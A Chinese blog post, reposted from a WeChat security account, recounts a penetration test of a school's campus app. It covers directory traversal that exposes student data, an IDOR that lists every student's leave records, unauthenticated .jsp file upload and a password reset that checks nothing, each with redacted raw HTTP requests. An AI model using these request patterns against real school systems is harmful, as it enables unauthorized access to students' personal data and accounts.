记一次对某学校APP渗透

admin 2024年4月24日18:31:05评论3 views字数 1759阅读5分51秒阅读模式

在对目标进行目录扫描时扫到/oa/目录可以进行目录遍历日志文件

在日志文件中可以看到学生敏感信息

记一次对某学校APP渗透

打厚码

记一次对某学校APP渗透

在学校官网查看到学校的校园APP 可以使用上面泄漏的学号和身份证后6位登录到系统中。

个人请假信息越权

记一次对某学校APP渗透

抓取数据包,修改请求数据,返回全校学生请假信息

POST /api/oa/xxx/list?token=xxxx HTTP/1.1
Content-Type: application/json;charset=utf-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; MI 9 Build/PQ3A.190705.11211812)
Host: xxxxxx
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 40

{"page":{"currPage":1,"pageSize":100,},}
记一次对某学校APP渗透修改数据包测试
记一次对某学校APP渗透

未授权-任意文件上传

头像更换处 上传文件

POST /api/file/upload HTTP/1.1
Host: xxxxx
Content-Length: 189
User-Agent: Mozilla/5.0 (Linux; Android 9; MI 9 Build/PQ3A.190705.11211812; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.114 Mobile Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaAZK16iHBfTCIGBa
Accept: */*
Origin: xxxxx
X-Requested-With: com.goaltall.superschool.student.activity
Referer: xxxxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryaAZK16iHBfTCIGBa
Content-Disposition: form-data; name="file"; filename="h4.jsp"
Content-Type: image/jpeg



123

------WebKitFormBoundaryaAZK16iHBfTCIGBa--
记一次对某学校APP渗透

密码修改

小程序登录处,忘记密码

记一次对某学校APP渗透

下一步,点击修改手机号,任意手机号即可,无任何验证,通过抓包也可以获取管理员手机号,或者进行验证码爆破,4位验证码无任何校验

记一次对某学校APP渗透

输入新手机号

记一次对某学校APP渗透

重置密码

记一次对某学校APP渗透
POST /api/auth/user/getmsg/code?idCard=xxxx&phoneNum=xxxx&type=1 HTTP/1.1
Content-Type: application/json;charset=utf-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; MI 9 Build/PQ3A.190705.11211812)
Host: xxxx
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 0

直接跳转重置密码

记一次对某学校APP渗透

管理员账号绑定手机号也可以获取到

记一次对某学校APP渗透
Tips:

HVV招聘:投递到-->

https://send2me.cn/Ubbozd6R/S6-vFqExvjv4EA

考证咨询全网最低最优惠报考NISP/CISP/CISSP/PTE/PTS/IRE/IRS等证书,后台回复“好友”加V私聊。

记一次对某学校APP渗透

【2024HW】持续招聘中:多个优质HW项目(有新增)

记一次对某学校APP渗透

浅谈一次省护红队的经历

记一次对某学校APP渗透

[韭]第一次参加护网行动要注意什么??

原文始发于微信公众号(WIN哥学安全):记一次对某学校APP渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月24日18:31:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次对某学校APP渗透http://cn-sec.com/archives/2687525.html

发表评论

匿名网友 填写信息